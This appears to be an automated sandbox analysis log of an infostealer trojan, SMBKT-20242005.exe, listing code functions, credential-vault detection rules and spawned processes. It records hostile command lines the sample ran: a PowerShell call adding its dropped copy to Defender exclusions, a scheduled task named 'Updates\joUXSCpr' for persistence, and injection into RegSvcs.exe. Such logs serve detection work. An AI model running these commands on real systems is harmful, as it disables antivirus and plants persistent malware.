                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E98C581_2_08E98C58
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E925521_2_08E92552
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9DEA01_2_08E9DEA0
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9C6801_2_08E9C680
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9C6701_2_08E9C670
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E99FD81_2_08E99FD8
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E997A01_2_08E997A0
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9F7681_2_08E9F768
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0149E3A88_2_0149E3A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01494AB88_2_01494AB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01493EA08_2_01493EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_014941E88_2_014941E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06BB66588_2_06BB6658
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06BB56508_2_06BB5650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06BBB2928_2_06BBB292
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06BBC1F08_2_06BBC1F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06BB31108_2_06BB3110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06BB7DE08_2_06BB7DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06BB77008_2_06BB7700
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06BBE4108_2_06BBE410
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06BB00408_2_06BB0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06BB5D4B8_2_06BB5D4B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06BB00068_2_06BB0006
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_02A3DFAC9_2_02A3DFAC
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA31D09_2_04CA31D0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA92D09_2_04CA92D0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA2D299_2_04CA2D29
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA44089_2_04CA4408
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA74189_2_04CA7418
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA74289_2_04CA7428
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA65349_2_04CA6534
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA00409_2_04CA0040
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA00159_2_04CA0015
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA31489_2_04CA3148
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA315D9_2_04CA315D
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA92C09_2_04CA92C0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA43F89_2_04CA43F8
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA8D109_2_04CA8D10
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA8D209_2_04CA8D20
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA9E519_2_04CA9E51
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CA9E609_2_04CA9E60
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB73709_2_04CB7370
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB04789_2_04CB0478
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB96E09_2_04CB96E0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB26289_2_04CB2628
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_04CB00409_2_04CB0040
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_051E8A609_2_051E8A60
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_051E00069_2_051E0006
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_051E00409_2_051E0040
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_053925589_2_05392558
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_053997B09_2_053997B0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_05399FD89_2_05399FD8
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539DEA09_2_0539DEA0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539A9399_2_0539A939
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539B8409_2_0539B840
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_053925489_2_05392548
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539A46C9_2_0539A46C
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_05398C489_2_05398C48
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539D4E99_2_0539D4E9
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539DCD09_2_0539DCD0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539DCCD9_2_0539DCCD
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_053997219_2_05399721
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539F7689_2_0539F768
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539B7AD9_2_0539B7AD
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539C6709_2_0539C670
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_053996B09_2_053996B0
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539C6809_2_0539C680
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539D8799_2_0539D879
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539D8889_2_0539D888
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539DA709_2_0539DA70
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 9_2_0539DA619_2_0539DA61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0300A28815_2_0300A288
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0300E6B815_2_0300E6B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0300AA5015_2_0300AA50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_03004AB815_2_03004AB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_03003EA015_2_03003EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_030041E815_2_030041E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0565015_2_06B05650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0665815_2_06B06658
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0242815_2_06B02428
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B07DE015_2_06B07DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0B2A015_2_06B0B2A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0C1F015_2_06B0C1F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0770015_2_06B07700
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0E41015_2_06B0E410
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B05D6015_2_06B05D60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0004015_2_06B00040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_06B0000615_2_06B00006
                    Source: SMBKT-20242005.exeStatic PE information: invalid certificate
                    Source: SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003FFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SMBKT-20242005.exe
                    Source: SMBKT-20242005.exe, 00000001.00000002.1465713140.00000000076C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SMBKT-20242005.exe
                    Source: SMBKT-20242005.exe, 00000001.00000002.1461356615.0000000002DF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename459505ed-14a8-4c14-90e3-7a9b2c02174b.exe4 vs SMBKT-20242005.exe
                    Source: SMBKT-20242005.exe, 00000001.00000002.1460354065.000000000104E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SMBKT-20242005.exe
                    Source: SMBKT-20242005.exe, 00000001.00000002.1465224388.00000000073CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs SMBKT-20242005.exe
                    Source: SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs SMBKT-20242005.exe
                    Source: SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename459505ed-14a8-4c14-90e3-7a9b2c02174b.exe4 vs SMBKT-20242005.exe
                    Source: SMBKT-20242005.exe, 00000001.00000002.1465010804.0000000007260000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs SMBKT-20242005.exe
                    Source: SMBKT-20242005.exeBinary or memory string: OriginalFilenameoaJU.exe( vs SMBKT-20242005.exe
                    Source: SMBKT-20242005.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.SMBKT-20242005.exe.3e57898.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: SMBKT-20242005.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: joUXSCpr.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, MOpw42XW44bQchxYdQ.csSecurity API names: _0020.SetAccessControl
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, MOpw42XW44bQchxYdQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, MOpw42XW44bQchxYdQ.csSecurity API names: _0020.AddAccessRule
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, RVSMvvC2GPKFxIWs0H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, RVSMvvC2GPKFxIWs0H.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, MOpw42XW44bQchxYdQ.csSecurity API names: _0020.SetAccessControl
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, MOpw42XW44bQchxYdQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, MOpw42XW44bQchxYdQ.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/11@2/2
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeFile created: C:\Users\user\AppData\Roaming\joUXSCpr.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMutant created: \Sessions\1\BaseNamedObjects\WDHZBnHORSqPpNIwDQyWox
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeFile created: C:\Users\user\AppData\Local\Temp\tmp6AB.tmpJump to behavior
                    Source: SMBKT-20242005.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SMBKT-20242005.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SMBKT-20242005.exeReversingLabs: Detection: 36%
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeFile read: C:\Users\user\Desktop\SMBKT-20242005.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SMBKT-20242005.exe "C:\Users\user\Desktop\SMBKT-20242005.exe"
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\joUXSCpr.exe C:\Users\user\AppData\Roaming\joUXSCpr.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
